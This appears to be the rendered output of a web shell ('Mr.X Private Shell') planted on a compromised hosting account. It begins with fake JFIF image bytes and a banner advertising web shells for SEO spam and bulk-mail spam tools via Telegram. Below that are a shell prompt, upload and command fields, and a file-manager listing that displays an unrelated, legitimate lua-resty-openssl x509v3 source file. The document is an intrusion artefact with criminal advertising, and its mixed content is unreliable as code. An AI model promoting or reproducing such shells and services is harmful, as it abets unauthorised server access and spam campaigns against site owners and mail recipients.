����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

antiaginglove@216.73.216.231: ~ $
local ffi = require "ffi"

require "resty.openssl.include.ossl_typ"
require "resty.openssl.include.stack"
local asn1_macro = require "resty.openssl.include.asn1"

ffi.cdef [[
  // STACK_OF(OPENSSL_STRING)
  OPENSSL_STACK *X509_get1_ocsp(X509 *x);
  void X509_email_free(OPENSSL_STACK *sk);
  void X509V3_set_nconf(X509V3_CTX *ctx, CONF *conf);

  typedef struct EDIPartyName_st EDIPARTYNAME;

  typedef struct otherName_st OTHERNAME;

  typedef struct GENERAL_NAME_st {
      int type;
      union {
        char *ptr;
        OTHERNAME *otherName;   /* otherName */
        ASN1_IA5STRING *rfc822Name;
        ASN1_IA5STRING *dNSName;
        ASN1_TYPE *x400Address;
        X509_NAME *directoryName;
        EDIPARTYNAME *ediPartyName;
        ASN1_IA5STRING *uniformResourceIdentifier;
        ASN1_OCTET_STRING *iPAddress;
        ASN1_OBJECT *registeredID;
        /* Old names */
        ASN1_OCTET_STRING *ip;  /* iPAddress */
        X509_NAME *dirn;        /* dirn */
        ASN1_IA5STRING *ia5;    /* rfc822Name, dNSName,
                                    * uniformResourceIdentifier */
        ASN1_OBJECT *rid;       /* registeredID */
        ASN1_TYPE *other;       /* x400Address */
      } d;
    } GENERAL_NAME;

  // STACK_OF(GENERAL_NAME)
  typedef struct stack_st GENERAL_NAMES;

  // STACK_OF(X509_EXTENSION)
  int X509V3_add1_i2d(OPENSSL_STACK **x, int nid, void *value,
                    int crit, unsigned long flags);
  void *X509V3_EXT_d2i(X509_EXTENSION *ext);
  X509_EXTENSION *X509V3_EXT_i2d(int ext_nid, int crit, void *ext_struc);
  int X509V3_EXT_print(BIO *out, X509_EXTENSION *ext, unsigned long flag,
                     int indent);

  int X509_add1_ext_i2d(X509 *x, int nid, void *value, int crit,
                    unsigned long flags);
  // although the struct has plural form, it's not a stack
  typedef struct BASIC_CONSTRAINTS_st {
    int ca;
    ASN1_INTEGER *pathlen;
  } BASIC_CONSTRAINTS;

  void X509V3_set_ctx(X509V3_CTX *ctx, X509 *issuer, X509 *subject,
    X509_REQ *req, X509_CRL *crl, int flags);

  X509_EXTENSION *X509V3_EXT_nconf_nid(CONF *conf, X509V3_CTX *ctx, int ext_nid,
                                     const char *value);
  // X509_EXTENSION *X509V3_EXT_nconf(CONF *conf, X509V3_CTX *ctx, const char *name,
  //                                const char *value);
  int X509V3_EXT_print(BIO *out, X509_EXTENSION *ext, unsigned long flag,
    int indent);

  void *X509V3_get_d2i(const OPENSSL_STACK *x, int nid, int *crit, int *idx);

  int X509v3_get_ext_by_NID(const OPENSSL_STACK *x,
                           int nid, int lastpos);

   X509_EXTENSION *X509v3_get_ext(const OPENSSL_STACK *x, int loc);

  // STACK_OF(ACCESS_DESCRIPTION)
  typedef struct stack_st AUTHORITY_INFO_ACCESS;

  typedef struct ACCESS_DESCRIPTION_st {
    ASN1_OBJECT *method;
    GENERAL_NAME *location;
  } ACCESS_DESCRIPTION;

  typedef struct DIST_POINT_NAME_st {
    int type;
    union {
        GENERAL_NAMES *fullname;
        // STACK_OF(X509_NAME_ENTRY)
        OPENSSL_STACK *relativename;
    } name;
  /* If relativename then this contains the full distribution point name */
      X509_NAME *dpname;
  } DIST_POINT_NAME;

  typedef struct DIST_POINT_st {
    DIST_POINT_NAME *distpoint;
    ASN1_BIT_STRING *reasons;
    GENERAL_NAMES *CRLissuer;
    int dp_reasons;
  } DIST_POINT;

]]

asn1_macro.declare_asn1_functions("GENERAL_NAME")
asn1_macro.declare_asn1_functions("BASIC_CONSTRAINTS")
asn1_macro.declare_asn1_functions("AUTHORITY_INFO_ACCESS") -- OCSP responder and CA
asn1_macro.declare_asn1_functions("ACCESS_DESCRIPTION")
asn1_macro.declare_asn1_functions("DIST_POINT") -- CRL distribution points

Filemanager

Name Type Size Permission Actions
evp Folder 0755
x509 Folder 0755
asn1.lua File 1.69 KB 0644
bio.lua File 385 B 0644
bn.lua File 2.47 KB 0644
conf.lua File 214 B 0644
crypto.lua File 469 B 0644
dh.lua File 1.25 KB 0644
ec.lua File 1.95 KB 0644
ecdsa.lua File 497 B 0644
err.lua File 1.02 KB 0644
evp.lua File 5.21 KB 0644
hmac.lua File 502 B 0644
objects.lua File 637 B 0644
ossl_typ.lua File 2.78 KB 0644
param.lua File 3.45 KB 0644
pem.lua File 2.07 KB 0644
pkcs12.lua File 1.14 KB 0644
provider.lua File 1.02 KB 0644
rand.lua File 544 B 0644
rsa.lua File 876 B 0644
ssl.lua File 2.92 KB 0644
stack.lua File 1.1 KB 0644
x509_vfy.lua File 4.57 KB 0644
x509v3.lua File 3.59 KB 0644